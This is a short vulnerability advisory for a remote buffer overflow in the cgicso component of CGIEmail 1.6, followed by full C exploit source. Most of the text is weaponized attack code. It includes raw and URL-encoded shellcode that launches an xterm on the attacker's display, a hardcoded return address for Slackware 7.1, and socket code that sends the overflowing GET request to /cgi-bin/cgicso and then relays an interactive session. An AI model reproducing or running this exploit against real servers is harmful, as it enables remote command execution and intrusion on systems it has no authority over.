source: http://www.securityfocus.com/bid/6141/info A vulnerability has been discovered in CGIEmail. It should be noted that this vulnerability exists only if the server allows queries to remote hosts. A remotely exploitable buffer overflow has been discovered in a component included with CGIEmail. By sending a maliciously constructed GET request to the vulnerable server, it is possible for a remote attacker to overrun a buffer, potentially resulting in the execution of arbitrary system commands with the privileges of the mail server. /* * cso.c (06/30/01) * * Remote exploit for cgicso included with cgiemail 1.6 * Tested on Slackware Linux 7.1 running Apache 1.3.20 * Spawns an xterm on your display. * * * Note: In order to exploit, cgicso must be compiled with * CGI_CSO_HARDCODE undefined, otherwise it will bypass * the exploitable portion of code. * * * Exploit By: isox of hhp. ([email protected]) * Site: www.hhp-programming.net && 0xc0ffee.com */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #define RET 0xbfffe208 // Slackware 7.1.0 #define LEN 2038 #define PORT 80 char noncode[] = "\xeb\x4f\x5e\x31\xd2\x88\x56\x14\x88\x56\x18\x88\x56\x21\xb2\x2b" "\x31\xc9\xb1\x09\x80\x3c\x32\x4b\x74\x05\x42\xe2\xf7\xeb\x2b\x88" "\x34\x32\x31\xd2\x89\xf3\x89\x76\x36\x8d\x7e\x15\x89\x7e\x3a\x8d" "\x7e\x19\x89\x7e\x3e\x8d\x7e\x22\x89\x7e\x42\x89\x56\x46\x8d\x4e" "\x36\x8d\x56\x46\x31\xc0\xb0\x0b\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xac\xff\xff\xff" "/usr/X11R6/bin/xterm8-ut8-display8127.0.0.1:0K"; char code[] = "%eb%4f%5e%31%d2%88%56%14%88%56%18%88%56%21%b2%2b%31%c9%b1%9%80%3c" "%32%4b%74%5%42%e2%f7%eb%2b%88%34%32%31%d2%89%f3%89%76%36%8d%7e%15" "%89%7e%3a%8d%7e%19%89%7e%3e%8d%7e%22%89%7e%42%89%56%46%8d%4e%36%8d" "%56%46%31%c0%b0%b%cd%80%31%db%89%d8%40%cd%80%e8%ac%ff%ff%ff%2f%75" "%73%72%2f%58%31%31%52%36%2f%62%69%6e%2f%78%74%65%72%6d%38%2d%75%74" "%38%2d%64%69%73%70%6c%61%79%38" "%31%32%37%2e%30%2e%30%2e%31" // unicoded IP address "%3a%30%4b"; int main(int argc, char *argv[]) { char *buf, *p; long *addressp, address=RET; int i, diff=(strlen(code) - strlen(noncode)), sock, debug=0; struct hostent *t; struct sockaddr_in s; if(argc < 2) { fprintf(stderr, "usage: %s <host> [offset [--debug]]\n", argv[0]); exit(-1); } if(argc > 2) address -= atoi(argv[2]); if(argc > 3) { if((!strcmp(argv[3], "--debug")) || (!strcmp(argv[3], "-d"))) debug = 1; } fprintf(stderr, "Using Address: 0x%lx\n", address); buf = (char *)malloc(44 + LEN + diff + 1); p = buf; (*p++) = 'G'; (*p++) = 'E'; (*p++) = 'T'; (*p++) = ' '; (*p++) = '/'; (*p++) = 'c'; (*p++) = 'g'; (*p++) = 'i'; (*p++) = '-'; (*p++) = 'b'; (*p++) = 'i'; (*p++) = 'n'; (*p++) = '/'; (*p++) = 'c'; (*p++) = 'g'; (*p++) = 'i'; (*p++) = 'c'; (*p++) = 's'; (*p++) = 'o'; (*p++) = '?'; (*p++) = 'f'; (*p++) = 'i'; (*p++) = 'n'; (*p++) = 'g'; (*p++) = 'e'; (*p++) = 'r'; (*p++) = 'h'; (*p++) = 'o'; (*p++) = 's'; (*p++) = 't'; (*p++) = '='; (*p++) = 'A'; // Yes this should be an A (*p++) = '&'; (*p++) = 'q'; (*p++) = 'u'; (*p++) = 'e'; (*p++) = 'r'; (*p++) = 'y'; (*p++) = '='; (*p++) = 'A'; // Yes this should be an A (*p++) = 'A'; // Yes this should be an A (*p++) = 'A'; // Yes this should be an A for(i=0; i<strlen(code); i++) (*p++) = code[i]; addressp = (long *)p; for(i=0; i<(LEN - strlen(code)) + diff; i+=4) (*addressp++) = address; strcat(buf, "\n\n"); fprintf(stderr, "Using length: %d\n", strlen(buf)); /* * Connect */ if(s.sin_addr.s_addr=inet_addr(argv[1])) { if(!(t=gethostbyname(argv[1]))) { printf("Connection Failed.\n"); exit(-1); } memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr)); } s.sin_family=AF_INET; s.sin_port=htons(PORT); sock=socket(AF_INET,SOCK_STREAM,0); if(connect(sock,(struct sockaddr*)&s,sizeof(s))) { fprintf(stderr, "Connection failed.\n"); exit(-1); } fprintf(stderr, "done.\n"); fprintf(stderr, "Sending buffer... "); send(sock, buf, strlen(buf), 0); fprintf(stderr, "done.\n"); sleep(2); if(debug == 1) { fprintf(stderr, "Entering Debug Mode... \n"); initstream(sock); } close(sock); free(buf); exit(0); } int initstream(int sock) { int n; char recvbuf[1024]; fd_set rset; while (1) { FD_ZERO(&rset); FD_SET(sock,&rset); FD_SET(STDIN_FILENO,&rset); select(sock+1,&rset,NULL,NULL,NULL); if (FD_ISSET(sock,&rset)) { if((n=read(sock,recvbuf,1024)) <= 0) { printf("Connection closed by foreign host.\n"); exit(0); } recvbuf[n]=0; printf("%s",recvbuf); } if (FD_ISSET(STDIN_FILENO,&rset)) { if((n=read(STDIN_FILENO,recvbuf,1024)) > 0) { recvbuf[n]=0; write(sock,recvbuf,n); } } } return; }